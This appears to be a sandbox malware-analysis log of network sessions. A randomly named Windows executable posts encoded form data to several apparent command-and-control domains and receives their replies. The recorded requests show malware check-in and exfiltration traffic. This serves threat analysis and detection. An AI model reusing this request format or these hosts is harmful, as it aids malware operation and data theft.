9Fjx=pkIdC9rlNDRvDklUfaVlmtjQnoS5CwM25Boypi/Yor8Es0YvnbqBWI5kTTCw1AP+VEMY7zYlGozE+8dWOEwbnYENr70OM4zEDI1lvg3/5oN/UWcg32Md1RkZmL7AJkfHassQex+CYjV5rV7Q+YIcpHVXtrFRn0xfidcextrwbeeQ/KvPTk3/fCoh5SHLcFlE4EmVWiHBGjRiXSR6Fga5M1h+0t9dKd3Fpw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	62407	3.33.130.190	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:07:20.043185949 CEST	1793	OUT	POST /eswm/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 1245 Cache-Control: no-cache Connection: close Host: www.forthelement.com Origin: http://www.forthelement.com Referer: http://www.forthelement.com/eswm/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 70 6b 49 64 43 39 72 6c 4e 44 52 76 44 6b 6c 55 66 61 56 6c 6d 74 6a 51 6e 6f 53 35 43 77 4d 32 35 42 6f 79 70 69 2f 59 6f 72 45 45 74 48 41 76 68 38 32 42 58 49 35 6b 61 7a 43 74 31 41 50 6a 56 41 67 63 37 32 41 71 47 74 2f 45 39 61 42 57 49 31 77 62 75 59 45 4e 30 72 30 4c 42 59 7a 52 44 49 46 68 76 67 6e 2f 35 6f 4e 2f 55 55 30 67 2b 48 4d 64 7a 52 6b 61 6c 4c 37 48 4e 6b 66 6a 61 73 6b 71 65 78 4c 33 59 53 31 35 71 78 66 51 34 36 51 63 68 48 56 56 39 37 45 45 6e 30 39 36 69 64 42 6c 78 74 33 4a 62 5a 75 51 2f 4f 4f 4f 4b 6c 6e 68 4b 69 68 48 73 56 2f 5a 53 52 74 6c 68 45 6d 69 61 6b 44 77 48 51 49 4a 57 30 68 58 43 52 7a 6f 50 44 64 79 7a 6f 46 43 45 66 57 49 70 6f 36 66 2f 59 42 37 47 53 2f 75 39 45 4c 67 78 52 6c 52 35 73 46 6a 44 4d 54 4b 50 4d 64 62 61 4f 2b 69 58 4a 52 72 77 4a 42 66 33 59 4d 4a 4f 35 30 4c 6b 4b 52 34 77 77 79 44 49 68 4d 4b 4c 31 54 51 46 6f 69 53 41 63 53 38 4b 75 6c 65 4e 4d 70 47 39 4b 49 51 5a 2b 42 55 79 72 73 5a 79 41 48 51 73 76 53 73 76 6f 43 66 72 [TRUNCATED] Data Ascii: 9Fjx=pkIdC9rlNDRvDklUfaVlmtjQnoS5CwM25Boypi/YorEEtHAvh82BXI5kazCt1APjVAgc72AqGt/E9aBWI1wbuYEN0r0LBYzRDIFhvgn/5oN/UU0g+HMdzRkalL7HNkfjaskqexL3YS15qxfQ46QchHVV97EEn096idBlxt3JbZuQ/OOOKlnhKihHsV/ZSRtlhEmiakDwHQIJW0hXCRzoPDdyzoFCEfWIpo6f/YB7GS/u9ELgxRlR5sFjDMTKPMdbaO+iXJRrwJBf3YMJO50LkKR4wwyDIhMKL1TQFoiSAcS8KuleNMpG9KIQZ+BUyrsZyAHQsvSsvoCfr551UsqHCMdlLx+YxqmrKE3AGTHPuTMnTASVKRaLzuKzF8flIo7VGhP3nVIQSmYp0uXCbjLkQPZocZ2qGlqvM8x8g3cDks5x+IAxxNwLiSf2uPxH/agRwi8eOo5KBDxqVpHOg7CUbN0QaeNYY8Jg3pM6l5koWDpo1TDc6awuyBvVqHpDygSh/vKVAAQAqTVh7V7tfFEQSSP1Sa77b/YHvBahXUOFSkbKxOmOST403+6bhwj9XZaoj5A/vC95vyK8y0rET+YHr7NJhrq4heGRMYCexpIpwWXKGHls3AXDXZm/r5ZJaLUFGpj9BL1h+Jw/7NP94JMBjdMk3uMZOvjv30lXpa8/kbBtVST5nAW2xVmQkgoFSV21kiNaEcY6mJ5PuZrKyscXgR09i+JeNoSIDcCXwb0z5e+wit9B/H1PrQicWUQxaxdaK3lfu0KLm0mngKtRuOAsVLLdbGKDnkGRuOky6pm1LEHJCb5ftjXspXvMA5PuBsCZQmNoFqqxtrbRhsinmFoRH28dKiZLh5MimkwsL/eLl6d7cfh+TA+ILJaDnKdvLLiU40xrZZg7YFGPJ04Z32pogJa+c/4pA09krRYThhLaNb0bvAcgmsWvpMmnxByU364yXCHdU5Qgi2k110mYRQQI9onkMiXKAcoEdmitmQc39g46g+D [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	62408	3.33.130.190	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:07:22.616516113 CEST	488	OUT	GET /eswm/?9Fjx=kmg9BJrUCzlvU3B1U8cIsefRuOfVIhtZrQUgpiqKrOwCnwcSpMqzXu0YTkKwwz3EGAI1xXkfDLD4/+xpEkQKl9cp8dUrHPy6DKlu7hiR/LVjeBsCr0gmgApJoLXICQLrB8wEfno=&h20PB=Ilr0H HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.forthelement.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	62409	35.241.41.54	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:07:27.857121944 CEST	738	OUT	POST /d35k/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 209 Cache-Control: no-cache Connection: close Host: www.ngkwnq.xyz Origin: http://www.ngkwnq.xyz Referer: http://www.ngkwnq.xyz/d35k/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 72 61 43 70 6c 73 78 49 36 58 59 52 64 4a 55 39 2f 4f 66 6f 77 56 35 30 55 77 2b 6f 75 71 61 65 49 45 42 76 57 72 5a 70 45 75 4c 61 67 54 55 4d 76 2f 68 46 55 38 4e 32 69 61 68 58 71 4c 4b 77 59 63 68 6b 53 68 78 58 6c 65 4f 71 46 55 77 41 41 4f 34 49 71 61 68 74 51 67 48 4a 47 49 53 6d 55 5a 6c 39 65 54 6e 37 44 6f 66 42 78 70 56 7a 38 7a 58 62 35 2f 75 6d 6c 62 55 6a 64 51 74 74 6b 77 6a 76 45 6d 77 73 69 57 6c 6d 33 35 33 2b 4e 45 51 6d 46 75 4d 32 36 73 4f 4c 69 6d 66 45 6d 51 6f 55 2f 50 6e 45 69 77 72 41 6f 62 4f 6a 52 41 2b 41 62 62 66 55 6e 65 6c 6c 4a 4a 30 53 65 48 52 4f 2f 30 4e 36 79 74 79 33 Data Ascii: 9Fjx=raCplsxI6XYRdJU9/OfowV50Uw+ouqaeIEBvWrZpEuLagTUMv/hFU8N2iahXqLKwYchkShxXleOqFUwAAO4IqahtQgHJGISmUZl9eTn7DofBxpVz8zXb5/umlbUjdQttkwjvEmwsiWlm353+NEQmFuM26sOLimfEmQoU/PnEiwrAobOjRA+AbbfUnellJJ0SeHRO/0N6yty3
Jul 27, 2024 08:07:28.500519991 CEST	176	IN	HTTP/1.1 405 Method Not Allowed Server: nginx/1.20.2 Date: Sat, 27 Jul 2024 06:07:28 GMT Content-Type: text/html Content-Length: 157 Via: 1.1 google Connection: close
Jul 27, 2024 08:07:28.504059076 CEST	157	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	62410	35.241.41.54	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:07:30.442653894 CEST	762	OUT	POST /d35k/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 233 Cache-Control: no-cache Connection: close Host: www.ngkwnq.xyz Origin: http://www.ngkwnq.xyz Referer: http://www.ngkwnq.xyz/d35k/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 72 61 43 70 6c 73 78 49 36 58 59 52 48 71 63 39 73 64 33 6f 32 31 35 31 62 51 2b 6f 68 4b 62 58 49 45 4e 76 57 71 74 35 45 61 6e 61 6e 78 4d 4d 6f 2b 68 46 58 38 4e 32 71 36 68 57 75 4c 4b 6e 59 63 39 57 53 6c 31 58 6c 66 75 71 46 52 4d 41 41 59 77 48 6c 71 68 76 4d 67 48 4c 4c 6f 53 6d 55 5a 6c 39 65 53 44 42 44 6f 58 42 78 5a 46 7a 38 52 76 59 36 2f 75 6e 69 62 55 6a 5a 51 74 70 6b 77 69 66 45 6e 74 78 69 51 35 6d 33 39 37 2b 4e 51 38 6c 63 65 4d 34 6c 38 50 58 75 57 76 4d 72 44 35 66 35 35 76 6b 68 7a 6a 57 67 4e 50 35 4e 7a 2b 6a 4a 4c 2f 57 6e 63 39 58 4a 70 30 34 63 48 70 4f 74 6a 42 64 39 5a 58 55 7a 55 63 50 32 54 37 6c 6e 2b 41 53 44 2f 35 75 53 31 77 39 45 67 3d 3d Data Ascii: 9Fjx=raCplsxI6XYRHqc9sd3o2151bQ+ohKbXIENvWqt5EananxMMo+hFX8N2q6hWuLKnYc9WSl1XlfuqFRMAAYwHlqhvMgHLLoSmUZl9eSDBDoXBxZFz8RvY6/unibUjZQtpkwifEntxiQ5m397+NQ8lceM4l8PXuWvMrD5f55vkhzjWgNP5Nz+jJL/Wnc9XJp04cHpOtjBd9ZXUzUcP2T7ln+ASD/5uS1w9Eg==
Jul 27, 2024 08:07:31.648216963 CEST	176	IN	HTTP/1.1 405 Method Not Allowed Server: nginx/1.20.2 Date: Sat, 27 Jul 2024 06:07:30 GMT Content-Type: text/html Content-Length: 157 Via: 1.1 google Connection: close
Jul 27, 2024 08:07:31.648238897 CEST	157	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>
Jul 27, 2024 08:07:31.648392916 CEST	176	IN	HTTP/1.1 405 Method Not Allowed Server: nginx/1.20.2 Date: Sat, 27 Jul 2024 06:07:30 GMT Content-Type: text/html Content-Length: 157 Via: 1.1 google Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	62411	35.241.41.54	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:07:33.013747931 CEST	1775	OUT	POST /d35k/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 1245 Cache-Control: no-cache Connection: close Host: www.ngkwnq.xyz Origin: http://www.ngkwnq.xyz Referer: http://www.ngkwnq.xyz/d35k/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 72 61 43 70 6c 73 78 49 36 58 59 52 48 71 63 39 73 64 33 6f 32 31 35 31 62 51 2b 6f 68 4b 62 58 49 45 4e 76 57 71 74 35 45 61 76 61 67 43 45 4d 75 64 4a 46 57 38 4e 32 6b 61 68 62 75 4c 4b 6d 59 63 30 66 53 67 74 39 6c 62 65 71 45 7a 55 41 55 36 59 48 79 36 68 76 48 41 48 4b 47 49 53 4a 55 5a 31 68 65 54 7a 42 44 6f 58 42 78 66 4a 7a 36 44 58 59 38 2f 75 6d 6c 62 55 33 64 51 74 42 6b 7a 53 70 45 6e 6f 47 6a 6a 68 6d 33 64 72 2b 49 6c 51 6c 44 75 4d 74 6d 38 50 66 75 57 69 53 72 44 6c 69 35 35 7a 65 68 78 2f 57 78 4c 2b 54 4b 42 79 42 62 72 76 43 30 4d 35 39 51 73 63 76 55 6e 59 31 74 7a 52 4d 33 4a 44 66 72 52 6b 67 6a 69 4f 48 71 5a 49 77 44 76 59 2f 52 52 64 32 58 78 66 30 45 6b 2f 72 66 58 50 79 41 61 4b 70 45 72 6f 79 51 53 79 51 36 5a 63 71 34 35 39 58 6c 4b 4c 36 6e 7a 77 75 6c 54 6a 78 71 6d 42 4b 70 61 64 38 58 73 50 2f 68 6c 73 49 35 77 33 71 76 31 70 4a 36 4e 74 58 74 39 77 55 73 37 4f 62 34 63 6b 6e 66 63 2f 78 71 6e 46 72 63 32 58 31 46 56 56 33 5a 6f 54 69 30 68 66 30 71 [TRUNCATED] Data Ascii: 9Fjx=raCplsxI6XYRHqc9sd3o2151bQ+ohKbXIENvWqt5EavagCEMudJFW8N2kahbuLKmYc0fSgt9lbeqEzUAU6YHy6hvHAHKGISJUZ1heTzBDoXBxfJz6DXY8/umlbU3dQtBkzSpEnoGjjhm3dr+IlQlDuMtm8PfuWiSrDli55zehx/WxL+TKByBbrvC0M59QscvUnY1tzRM3JDfrRkgjiOHqZIwDvY/RRd2Xxf0Ek/rfXPyAaKpEroyQSyQ6Zcq459XlKL6nzwulTjxqmBKpad8XsP/hlsI5w3qv1pJ6NtXt9wUs7Ob4cknfc/xqnFrc2X1FVV3ZoTi0hf0qJUz+HkwnJ6ivez5sG+yzKghn2M8k7OMG0FPVazekDo+h33OHdVIGCJjEuvEZzOvlHAxHv3VekgZ4vDBiV9y1/SomruIznFDbipFDqUNP42mBeMqqmXvhhS/kO6JyfsKy/L3HtnCtt8atqHqxqHFolsTdMDWFNBgYPukwfaYAudz6ejIXJQ12clBhAQJOoldCTS2VPuHIw6ekzc7oZr6GZKXb/JiapBCPoLZKGTPV3oL3jRTz0Zo8I0F+G79K6BFL3fpMVhRKR0+ZtUHKAD8zFMgmLMx8HK4X9Q6KRPdR2dtn2EJbWsDLiDTIDuulTGKIx35p2NO4ZnXRr2em54H3n5s/isu4nvhGCGkVfCaQvbOKOO7HjIucljJeEITeXsH2GQU6UcyZaf9atzt+grQ7rNITvqW5TCDL3waxsHAxHkXjdkIwSu7xUQDYlX4eZKWVRIByIhA/uNBsC7OSiBWFIoW3WVG5fuwDvCV+l7iCe2UYNOMf3b/sbqxPrt26Ppl9APaV/LGkB5827i9ZuSPPOjVghTtLWTGxh4frrWtS5+87wkBCfJmOATmxbpoHFEqfyVnLun3PWz75zzEK4Dx6VetlVrbZ6NXBc9GGMn1LXzM5DMrDKQwHjI8NoziIozC3yBvO2gcDavbM/8qSZKPteaevSlS3VPAG1s [TRUNCATED]
Jul 27, 2024 08:07:33.633399963 CEST	176	IN	HTTP/1.1 405 Method Not Allowed Server: nginx/1.20.2 Date: Sat, 27 Jul 2024 06:07:33 GMT Content-Type: text/html Content-Length: 157 Via: 1.1 google Connection: close
Jul 27, 2024 08:07:33.636008024 CEST	157	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	62412	35.241.41.54	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:07:35.581542969 CEST	482	OUT	GET /d35k/?9Fjx=mYqJmY5N0EkuGYw55ICE83MYfmiquaD5Mn1sUdQzEPuHiGIXpacTVdBwiKhhqJWGIPtvCRJCv4+YbwE4X6wPqeg8BmvgAMn8RLdfcR/MG4n//pV4lC7duaqjl6kReXVA9zSQFQA=&h20PB=Ilr0H HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.ngkwnq.xyz User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Jul 27, 2024 08:07:36.200953007 CEST	300	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Sat, 27 Jul 2024 06:07:36 GMT Content-Type: text/html Content-Length: 5161 Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT Vary: Accept-Encoding ETag: "65a4939c-1429" Cache-Control: no-cache Accept-Ranges: bytes Via: 1.1 google Connection: close
Jul 27, 2024 08:07:36.207060099 CEST	1236	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
Jul 27, 2024 08:07:36.207113981 CEST	1236	IN	Data Raw: 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 6e 7d 66 75 6e 63 74 69 6f 6e 20 72 65 70 6f 72 74 4c 6f 61 64 69 6e 67 28 6e 29 7b 6e 3d 6e 7c 7c 7b 7d 3b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 28 77 69 6e 64 6f Data Ascii: w Image).src=n}function reportLoading(n){n=n\|\|{};var o=function(){for(var n=(window.location.search.substr(1)\|\|"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.
Jul 27, 2024 08:07:36.207149029 CEST	1236	IN	Data Raw: 74 72 3d 64 73 66 72 70 66 76 65 64 6e 63 70 73 73 6e 74 6e 77 62 69 70 72 65 69 6d 65 75 74 73 76 22 29 3b 28 65 28 29 7c 7c 72 28 29 29 26 26 22 61 6e 64 72 6f 69 64 22 3d 3d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f Data Ascii: tr=dsfrpfvedncpssntnwbipreimeutsv");(e()\|\|r())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)\|\|n.match(/ipad/i)\|\|n.match(/iphone/i)?"iphone":n.match(/android/i)\|\|n.match(/ap
Jul 27, 2024 08:07:36.207181931 CEST	1236	IN	Data Raw: 28 22 73 72 63 22 2c 22 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 30 31 2f 77 65 6c 66 61 72 65 61 67 65 6e 63 79 2f 76 63 6f 6e 73 6f 6c 65 2e 6d 69 6e 2d 33 2e 33 2e 30 2e 6a 73 22 29 2c 24 68 65 61 64 2e 69 6e 73 65 72 Data Ascii: ("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src
Jul 27, 2024 08:07:36.207216024 CEST	217	IN	Data Raw: e6 b2 a1 e6 9c 89 e5 b9 bf e5 91 8a 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 94 b5 e5 bd b1 e6 92 ad e6 94 be e4 b8 8d e5 8d a1 e9 a1 bf 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 b2 be e5 bd a9 e8 a7 86 e9 a2 91 e5 ad 98 e5 85 a5 e7 bd 91 e7 9b 98 e9 9a 8f Data Ascii: </div><div></div><div></div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	62413	188.95.113.62	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:07:41.485977888 CEST	768	OUT	POST /gx7l/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 209 Cache-Control: no-cache Connection: close Host: www.hermandadcoyotes.com Origin: http://www.hermandadcoyotes.com Referer: http://www.hermandadcoyotes.com/gx7l/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 58 35 4a 54 4f 71 33 61 52 54 36 33 6c 6e 4a 42 66 4d 43 37 37 73 57 4f 72 2b 6c 64 67 6d 68 36 61 57 4c 52 73 2b 64 57 32 62 34 36 7a 75 77 57 58 4c 67 6b 4d 48 6e 75 74 43 31 75 2f 4c 46 70 37 61 38 32 74 57 67 63 58 35 37 66 7a 41 56 41 5a 4d 70 69 42 78 39 79 52 61 58 56 33 4e 50 64 4c 55 43 31 39 75 4a 7a 2b 32 79 6d 31 48 5a 67 63 32 35 4a 77 57 4b 7a 52 53 44 6e 33 53 33 33 39 44 66 4e 5a 6f 5a 78 62 33 32 37 6f 48 61 35 34 67 50 4d 30 53 68 49 30 6a 55 4d 2b 4d 79 37 76 74 63 6b 6a 72 78 69 6f 5a 78 54 4d 76 76 2f 42 45 6f 6c 6d 45 73 78 42 69 67 36 63 6c 66 62 35 71 50 4c 7a 34 6c 62 45 56 39 70 Data Ascii: 9Fjx=X5JTOq3aRT63lnJBfMC77sWOr+ldgmh6aWLRs+dW2b46zuwWXLgkMHnutC1u/LFp7a82tWgcX57fzAVAZMpiBx9yRaXV3NPdLUC19uJz+2ym1HZgc25JwWKzRSDn3S339DfNZoZxb327oHa54gPM0ShI0jUM+My7vtckjrxioZxTMvv/BEolmEsxBig6clfb5qPLz4lbEV9p
Jul 27, 2024 08:07:42.404979944 CEST	479	IN	HTTP/1.1 404 Not Found Date: Sat, 27 Jul 2024 06:07:42 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Jul 27, 2024 08:07:42.405172110 CEST	479	IN	HTTP/1.1 404 Not Found Date: Sat, 27 Jul 2024 06:07:42 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	62414	188.95.113.62	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

